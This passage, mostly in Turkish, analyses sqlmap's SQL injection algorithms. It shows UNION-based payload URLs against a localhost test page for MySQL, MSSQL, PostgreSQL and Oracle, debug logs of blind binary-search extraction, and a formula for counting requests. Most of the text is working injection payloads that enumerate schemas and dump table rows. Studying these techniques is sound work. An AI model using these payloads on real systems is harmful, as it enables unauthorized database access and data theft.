http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHAR(95) CHAR(95) CHAR(83) CHAR(84) CHAR(65) CHAR(82) CHAR(84) CHAR(95) CHAR(95)) CAST(column_name AS varchar) (CHAR(95) CHAR(95) CHAR(68) CHAR(69) CHAR(76) CHAR(95) CHAR(95))  CAST(data_type AS varchar) (CHAR(95) CHAR(95) CHAR(83) CHAR(84) CHAR(79) CHAR(80) CHAR(95) CHAR(95)), NULL, NULL FROM Northwind.information_schema.columns, Northwind.information_schema.tables WHERE Northwind.information_schema.columns.table_name=(CHAR(97) CHAR(99) CHAR(116) CHAR(111) CHAR(114)) AND Northwind.information_schema.columns.table_name=Northwind.information_schema.tables.table_name AND Northwind.information_schema.tables.table_type=(CHAR(66) CHAR(65) CHAR(83) CHAR(69) CHAR(32) CHAR(84) CHAR(65) CHAR(66) CHAR(76) CHAR(69))-- ('1'='1&database=mssql&type=2&order=1&log=1 

...

        Postgresql

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(65)||CHR(82)||CHR(84)||CHR(95)||CHR(95))||CAST(attname AS bpchar)||(CHR(95)||CHR(95)||CHR(68)||CHR(69)||CHR(76)||CHR(95)||CHR(95))|| CAST(typname AS bpchar)||(CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(79)||CHR(80)||CHR(95)||CHR(95)), NULL, NULL FROM pg_namespace, pg_type, pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname=(CHR(97)||CHR(99)||CHR(116)||CHR(111)||CHR(114)) AND nspname=(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99))-- ('1'='1&database=pgsql&type=2&order=1&log=1 

...

        Oracle 

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL FROM DUAL-- ('1'='1&database=oracle&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL FROM DUAL-- ('1'='1&database=oracle&type=2&order=1&log=1

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(65)||CHR(82)||CHR(84)||CHR(95)||CHR(95))||CAST(COLUMN_NAME AS varchar(4000))||(CHR(95)||CHR(95)||CHR(68)||CHR(69)||CHR(76)||CHR(95)||CHR(95))|| CAST(DATA_TYPE AS varchar(4000))||(CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(79)||CHR(80)||CHR(95)||CHR(95)), NULL, NULL FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=(CHR(65)||CHR(67)||CHR(84)||CHR(79)||CHR(82))-- ('1'='1&database=oracle&type=2&order=1&log=1 

...

 

     Satırları Alma     

 

         Mysql

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), actor_id, CHAR(95,95,83,84,79,80,95,95)), NULL, NULL, NULL FROM sakila.actor-- ('1'='1&database=mysql&type=2&order=1&log=1 

...

 

        Mssql 

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHAR(95) CHAR(95) CHAR(83) CHAR(84) CHAR(65) CHAR(82) CHAR(84) CHAR(95) CHAR(95)) CAST(actor_id AS varchar) (CHAR(95) CHAR(95) CHAR(83) CHAR(84) CHAR(79) CHAR(80) CHAR(95) CHAR(95)), NULL, NULL FROM Northwind..actor-- ('1'='1&database=mssql&type=2&order=1&log=1 

...

        Postgresql

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(65)||CHR(82)||CHR(84)||CHR(95)||CHR(95))||CAST(actor_id AS bpchar)||(CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(79)||CHR(80)||CHR(95)||CHR(95)), NULL, NULL FROM public.actor-- ('1'='1&database=pgsql&type=2&order=1&log=1 

...

        Oracle 

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL FROM DUAL-- ('1'='1&database=oracle&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL FROM DUAL-- ('1'='1&database=oracle&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(65)||CHR(82)||CHR(84)||CHR(95)||CHR(95))||CAST(actor_id AS varchar(4000))||(CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(79)||CHR(80)||CHR(95)||CHR(95)), NULL, NULL FROM ACTOR-- ('1'='1&database=oracle&type=2&order=1&log=1 

...

Algoritma/Analiz

    Enjeksiyonu Bulma

 

        bağlantıyı kontrol etmek için istek

        url stabilitesini kontrol etmek için istekler

        test edilen parametrenin dinamik olup olmadığını kontrol etmek için istek (nümerik bir değer kullanılarak: 47)

        test edilen parametrenin dinamik olup olmadığını kontrol etmek için istek (tek tırnak içeren bir dizgi değer kullanılarak: 'NoValue)

        test edilen parametrenin dinamik olup olmadığını kontrol etmek için istek (çift tırnak içeren bir dizgi değer kullanılarak: "NoValue)

        test edilen parametrenin nümerik enjekte edilebilirliğini kontrol etmek için istek 

        test edilen parametrenin dizgi (string) enjekte edilebilirliğini kontrol etmek için istek  (orjinal cevabın md5'i ile veya --string opsiyonu ile verilen anahtar kelime ile karşılaştırarak)  

         

    Kör

 

            Sayılar, Karakterler

 

...
[21:19:50] [INFO] query: CURRENT_USER()
[21:19:50] [DEBUG] request: http://localhost/sqlinj.php, POST: name=5 AND ORD(MID((CURRENT_USER()), 1, 1)) > 63&blind=false&order=1&database=mysql
[21:19:50] [DEBUG] request: http://localhost/sqlinj.php, POST: name=5 AND ORD(MID((CURRENT_USER()), 1, 1)) > 95&blind=false&order=1&database=mysql
[21:19:50] [DEBUG] request: http://localhost/sqlinj.php, POST: name=5 AND ORD(MID((CURRENT_USER()), 1, 1)) > 111&blind=false&order=1&database=mysql
[21:19:50] [DEBUG] request: http://localhost/sqlinj.php, POST: name=5 AND ORD(MID((CURRENT_USER()), 1, 1)) > 119&blind=false&order=1&database=mysql
[21:19:50] [DEBUG] request: http://localhost/sqlinj.php, POST: name=5 AND ORD(MID((CURRENT_USER()), 1, 1)) > 115&blind=false&order=1&database=mysql
[21:19:50] [DEBUG] request: http://localhost/sqlinj.php, POST: name=5 AND ORD(MID((CURRENT_USER()), 1, 1)) > 113&blind=false&order=1&database=mysql
[21:19:50] [DEBUG] request: http://localhost/sqlinj.php, POST: name=5 AND ORD(MID((CURRENT_USER()), 1, 1)) > 114&blind=false&order=1&database=mysql
...

 

         Aynı binary search algoritmasını kullandığından sqlmap'in nümerik enjeksiyon kullanıp kullanmaması farketmemektedir.  sqlmap verinin sonunun gelip gelmediğini nasıl anlamaktadır? Extra (olmayan) karakteri arayarak. Binary search sırasında ASCII değeri 0 (sıfır)'a düşer ve sqlmap verinin sona erdiğini anlar. Bu nedenle sqlmap her bir veri için 6 extra istekte bulunur.(63, 31, 15, 7, 3, 1)

        Herhangi bir verinin çekilmesinden önce gönderilen 11 isteği de göz önünde bulundurursak, herhangi bir saldırıda çalıştırılan istek sayısı şu şekilde formüle edilebilir ;

 

f(n) = 7*n + 6 + 11

 

n dökümü alınan verinin uzunluğu,

6 verinin sonunu anlamak için çalıştırılan istek sayısı, ve

11 herhangi bir verinin çekilmesinden önce gönderilen istek sayısı

           Neden 7*n. Kör sql enjeksiyonu ile '?' karakterini (ascii 63) çektiğimiz aşağıdaki sqlmap hata ayıklama kayıtlarına bakalım. '?' karakterini bulması 7 istek almaktadır, ancak ilk karşılaştırma yapılan ascii değeri 63'tür.  Yani 1 uzunluğunda veri için , 7*1+6 = 13 istek üretilmiştir. Binary search her karakter için sabit 7 istek üretmektedir! 

 

[INFO] fetching expression output: 'select '?''
[INFO] query: select '?'
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 1, 1)) > 63 AND '1'='1&type=0&log=0&order=1&database=mysql
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 1, 1)) > 31 AND '1'='1&type=0&log=0&order=1&database=mysql
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 1, 1)) > 47 AND '1'='1&type=0&log=0&order=1&database=mysql
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 1, 1)) > 55 AND '1'='1&type=0&log=0&order=1&database=mysql
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 1, 1)) > 59 AND '1'='1&type=0&log=0&order=1&database=mysql
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 1, 1)) > 61 AND '1'='1&type=0&log=0&order=1&database=mysql
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 1, 1)) > 62 AND '1'='1&type=0&log=0&order=1&database=mysql
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 2, 1)) > 63 AND '1'='1&type=0&log=0&order=1&database=mysql
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 2, 1)) > 31 AND '1'='1&type=0&log=0&order=1&database=mysql
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 2, 1)) > 15 AND '1'='1&type=0&log=0&order=1&database=mysql
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 2, 1)) > 7 AND '1'='1&type=0&log=0&order=1&database=mysql
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 2, 1)) > 3 AND '1'='1&type=0&log=0&order=1&database=mysql
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 2, 1)) > 1 AND '1'='1&type=0&log=0&order=1&database=mysql
[INFO] retrieved: ?
[INFO] performed 13 queries in 1 seconds
select '?':    '?'

           

    Union Parse Algoritması

 

             SQL enjeksiyonunu bulmak ve konfirme etmek için kör ile aynı istekler çalışır.

             Parantez eşitleme için istekler

             Sutün sayısını hesaplamak için istekler

 

[21:40:46] [DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE') UNION ALL SELECT NULL-- ('1'='1&blind=false&order=1&database=mysql
[21:40:46] [DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE') UNION ALL SELECT NULL, NULL-- ('1'='1&blind=false&order=1&database=mysql
[21:40:46] [DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&blind=false&order=1&database=mysql
[21:40:46] [DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&blind=false&order=1&database=mysql

 

             Union enjeksiyonu kontrolü için "__START_23424_STOP__" dizgisi kullanılmaktadır

 

[21:40:46] [DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE') UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), CHAR(49,49,53,49,57), CHAR(95,95,83,84,79,80,95,95)), NULL, NULL, NULL-- ('1'='1&blind=false&order=1&database=mysql

 

             belirtilen veritabanından ve tablodan sutün isimlerinin alınması (ikinci istek sağlama için kullanılmaktadır)

 

[21:40:46] [DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE') UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), column_name, CHAR(95,95,68,69,76,95,95), data_type, CHAR(95,95,83,84,79,80,95,95)), NULL, NULL, NULL FROM information_schema.COLUMNS WHERE table_name=CHAR(97,99,116,111,114) AND table_schema=CHAR(115,97,107,105,108,97)-- ('1'='1&blind=false&order=1&database=mysql
[21:40:46] [DEBUG] request: http://localhost/sqlinj.php POST: name=PENELOPE') UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), column_name, CHAR(95,95,68,69,76,95,95), data_type, CHAR(95,95,83,84,79,80,95,95)), NULL, NULL, NULL FROM information_schema.COLUMNS WHERE table_name=CHAR(97,99,116,111,114) AND table_schema=CHAR(115,97,107,105,108,97)-- ('1'='1&blind=false&order=1&database=mysql

 

             veriyi almak için kullanılan gerçek istek (ikinci istek sağlama için kullanılmaktadır) çıktıyı parse etmek kolaylaştırmak için bir concat içinde

 

[21:40:46] [DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE') UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), actor_id, CHAR(95,95,68,69,76,95,95), first_name, CHAR(95,95,68,69,76,95,95), last_name, CHAR(95,95,68,69,76,95,95), last_update, CHAR(95,95,83,84,79,80,95,95)), NULL, NULL, NULL FROM sakila.actor-- ('1'='1&blind=false&order=1&database=mysql